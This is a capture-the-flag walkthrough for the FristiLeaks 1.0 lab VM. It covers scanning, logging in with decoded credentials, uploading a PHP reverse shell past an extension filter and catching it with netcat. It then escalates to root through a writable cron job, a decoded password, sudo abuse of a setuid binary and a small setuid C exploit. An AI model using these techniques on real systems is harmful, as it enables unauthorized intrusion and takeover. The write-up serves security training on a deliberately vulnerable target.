First of all you need to manually edit the VM's MAC address to 08:00:27:A5:A6:76.
After installed the vm, IP address is displayed.
But we still can try nmap.
root@kali:~# nmap 172.16.219.0/24
Starting Nmap 7.31 ( https://nmap.org ) at 2018-01-24 10:00 PST
... ...
Nmap scan report for 172.16.219.176
Host is up (-0.00070s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE
80/tcp open http
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Nmap done: 256 IP addresses (4 hosts up) scanned in 201.14 seconds
root@kali:~# nikto -host 172.16.219.176
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.16.219.176
+ Target Hostname: 172.16.219.176
+ Target Port: 80
+ Start Time: 2018-01-24 10:51:21 (GMT-8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
+ Server leaks inodes via ETags, header found with file /, inode: 12722, size: 703, mtime: Tue Nov 17 10:45:47 2015
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Entry '/cola/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/sisi/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/beer/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 3 entries which should be manually viewed.
+ PHP/5.3.3 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8348 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time: 2018-01-24 10:51:36 (GMT-8) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Navigate to : http://172.16.219.176/fristi/
Yes! There's a admin portal login window!
First look into the source, there're several comments.
After base64 decode the second comment, I got a picture.
Let's try to login using the "eezeepz" as username and "keKkeKKeKKeKkEkkEk" as password.
Login successful!
This is a file upload page, so it might be possible to upload a backdoor shell. I used this backdoor:
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
Ooops! There's a filter! Okay, let's try to use php.jpg as extension to bypass this filter.
It worked! Now using the backdoor we can do some fancy things. Navigate to http://172.16.219.176/fristi/uploads/php-reverse-shell.php.jpg in your browser. Inside the kali box run:
root@kali:/home/flora# nc -lnvp 1234
listening on [any] 1234 ...
connect to [172.16.219.177] from (UNKNOWN) [172.16.219.176] 35707
Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
10:53:24 up 5:08, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-4.1$
sh-4.1$ cat /var/www/notes.txt
cat /var/www/notes.txt
hey eezeepz your homedir is a mess, go clean it up, just dont delete
the important stuff.
-jerry
sh-4.1$ ls /home
ls /home
admin
eezeepz
fristigod
sh-4.1$ ls /home/eezeepz
ls /home/eezeepz
MAKEDEV
cbq
cciss_id
cfdisk
chcpu
chgrp
chkconfig
chmod
chown
clock
consoletype
cpio
cryptsetup
ctrlaltdel
cut
halt
hostname
hwclock
kbd_mode
kill
killall5
kpartx
nameif
nano
netreport
netstat
new-kernel-pkg
nice
nisdomainname
nologin
notes.txt
tar
taskset
tc
telinit
touch
tracepath
tracepath6
true
tune2fs
weak-modules
wipefs
xfs_repair
ypdomainname
zcat
zic
sh-4.1$
sh-4.1$ cat /home/eezeepz/notes.txt
cat /home/eezeepz/notes.txt
Yo EZ,
I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/
Don't forget to specify the full path for each binary!
Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.
- Jerry
sh-4.1$
According to the note:
sh-4.1$ echo "/home/admin/chmod 777 /home/admin" > /tmp/runthis
echo "/home/admin/chmod 777 /home/admin" > /tmp/runthis
sh-4.1$ ls -l
ls -l
total 32
-rw-r--r-- 1 admin admin 16589 Jan 24 12:43 cronresult
-rw-r--r-- 1 apache apache 130 Jan 24 11:51 exp.c
-rw-rw-rw- 1 apache apache 34 Jan 24 12:43 runthis
sh-4.1$ /home/eezeepz/chmod 777 runthis
/home/eezeepz/chmod 777 runthis
sh-4.1$ ls -l
ls -l
total 32
-rw-r--r-- 1 admin admin 16634 Jan 24 12:44 cronresult
-rw-r--r-- 1 apache apache 130 Jan 24 11:51 exp.c
-rwxrwxrwx 1 apache apache 34 Jan 24 12:43 runthis
sh-4.1$ ./runthis
./runthis
/home/admin/chmod: changing permissions of `/home/admin': Operation not permitted
sh-4.1$ ls -l /home/admin
ls -l /home/admin
total 632
-rwxrwxrwx 1 admin admin 45224 Nov 18 2015 cat
-rwxrwxrwx 1 admin admin 48712 Nov 18 2015 chmod
-rwxrwxrwx 1 admin admin 737 Nov 18 2015 cronjob.py
-rwxrwxrwx 1 admin admin 21 Nov 18 2015 cryptedpass.txt
-rwxrwxrwx 1 admin admin 258 Nov 18 2015 cryptpass.py
-rwxrwxrwx 1 admin admin 90544 Nov 18 2015 df
-rwxrwxrwx 1 admin admin 24136 Nov 18 2015 echo
-rwxrwxrwx 1 admin admin 163600 Nov 18 2015 egrep
-rwxrwxrwx 1 admin admin 163600 Nov 18 2015 grep
-rwxrwxrwx 1 admin admin 85304 Nov 18 2015 ps
-rw-r--r-- 1 fristigod fristigod 25 Nov 19 2015 whoisyourgodnow.txt
sh-4.1$
Now that we have access to the /home/admin folder.
There are a few files seem interesting.
sh-4.1$ cat /home/admin/whoisyourgodnow.txt
cat /home/admin/whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITG
sh-4.1$ cat /home/admin/cryptedpass.txt
cat /home/admin/cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq
sh-4.1$ cat /home/admin/cryptpass.py
cat /home/admin/cryptpass.py
#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys
def encodeString(str):
base64string= base64.b64encode(str)
return codecs.encode(base64string[::-1], 'rot13')
cryptoResult=encodeString(sys.argv[1])
print cryptoResult
Open a python terminal:
>>> def decode(str):
... de = codecs.decode(str[::-1],'rot13')
... return base64.b64decode(de)
...
>>> decode('=RFn0AKnlMHMPIzpyuTI0ITG')
'LetThereBeFristi!'
>>> decode('mVGZ3O3omkJLmy2pcuTq')
'thisisalsopw123'
>>>
Spawning a TTY shell:
sh-4.1$ perl -e 'exec "/bin/sh";'
perl -e 'exec "/bin/sh";'
id
uid=48(apache) gid=48(apache) groups=48(apache)
su fristigod
standard in must be a tty
exit
sh-4.1$ echo os.system('/bin/bash')
echo os.system('/bin/bash')
sh: syntax error near unexpected token `('
sh-4.1$ echo os.system\('/bin/bash'\)
os.system(/bin/bash)
echo os.system\('/bin/bash'\)
sh-4.1$ python -c 'import pty; pty.spawn("/bin/sh")'
python -c 'import pty; pty.spawn("/bin/sh")'
sh-4.1$ su fristigod
su fristigod
Password: LetThereBeFristi!
bash-4.1$
bash-4.1$ sudo -l
sudo -l
[sudo] password for fristigod: LetThereBeFristi!
Matching Defaults entries for fristigod on this host:
requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User fristigod may run the following commands on this host:
(fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom
bash-4.1$
bash-4.1$ /var/fristigod/.secret_admin_stuff/doCom
/var/fristigod/.secret_admin_stuff/doCom
Nice try, but wrong user ;)
bash-4.1$ ls -la
ls -la
total 16
drwxr-x--- 3 fristigod fristigod 4096 Nov 25 2015 .
drwxr-xr-x. 19 root root 4096 Nov 19 2015 ..
-rw------- 1 fristigod fristigod 864 Nov 25 2015 .bash_history
drwxrwxr-x. 2 fristigod fristigod 4096 Nov 25 2015 .secret_admin_stuff
bash-4.1$ cat .bash_history
cat .bash_history
ls
pwd
ls -lah
cd .secret_admin_stuff/
ls
./doCom
./doCom test
sudo ls
exit
cd .secret_admin_stuff/
ls
./doCom
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
exit
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
groups
ls -lah
usermod -G fristigod fristi
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
less /var/log/secure e
Fexit
exit
exit
bash-4.1$
bash-4.1$ cd .secret_admin_stuff
cd .secret_admin_stuff
bash-4.1$ ls -l
ls -l
total 8
-rwsr-sr-x 1 root root 7529 Nov 25 2015 doCom
Look at the doCom file's permission, suid is set and owner is root.
bash-4.1$ ./doCom
./doCom
Nice try, but wrong user ;)
bash-4.1$ sudo -u fristi ./doCom chmod -R 777 /root
sudo -u fristi ./doCom chmod -R 777 /root
[sudo] password for fristigod: LetThereBeFristi!
bash-4.1$ ls /root
ls /root
fristileaks_secrets.txt
bash-4.1$ cat /root/fristileaks_secrets.txt
cat /root/fristileaks_secrets.txt
Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]
I wonder if you beat it in the maximum 4 hours it's supposed to take!
Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)
Flag: Y0u_kn0w_y0u_l0ve_fr1st1
bash-4.1$
Got the flag!
Some more exploits:
Use the setuid(0) method in Kioptrix 1.3(#4).
//expp.c:
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main(void)
{
setuid(0);
system("usermod -a -G admin fristigod");
}
Rename the expp.c to expp.c.jpg, upload it to server, then compile it to expp.
bash-4.1$ sudo -u fristi ./doCom chown root expp
sudo -u fristi ./doCom chown root expp
bash-4.1$ sudo -u fristi ./doCom chmod 6755 expp
sudo -u fristi ./doCom chmod 6755 expp
bash-4.1$ ls -l
ls -l
total 28
-rwsr-sr-x 1 root root 7529 Nov 25 2015 doCom
-rwsr-sr-x 1 root fristigod 6565 Jan 24 13:57 exp
-rwsr-sr-x 1 root fristigod 6574 Jan 24 14:01 expp
-rw-r--r-- 1 apache apache 133 Jan 24 14:00 expp.c
bash-4.1$ sudo -u fristi ./doCom ./expp
sudo -u fristi ./doCom ./expp
bash-4.1$ id
id
uid=502(fristigod) gid=502(fristigod) groups=502(fristigod)
bash-4.1$ sudo su
sudo su
Sorry, user fristigod is not allowed to execute '/bin/su' as root on localhost.localdomain.
bash-4.1$ sudo -u fristi ./doCom sudo su
sudo -u fristi ./doCom sudo su
[root@localhost .secret_admin_stuff]# id
id
uid=0(root) gid=0(root) groups=0(root)
[root@localhost .secret_admin_stuff]#
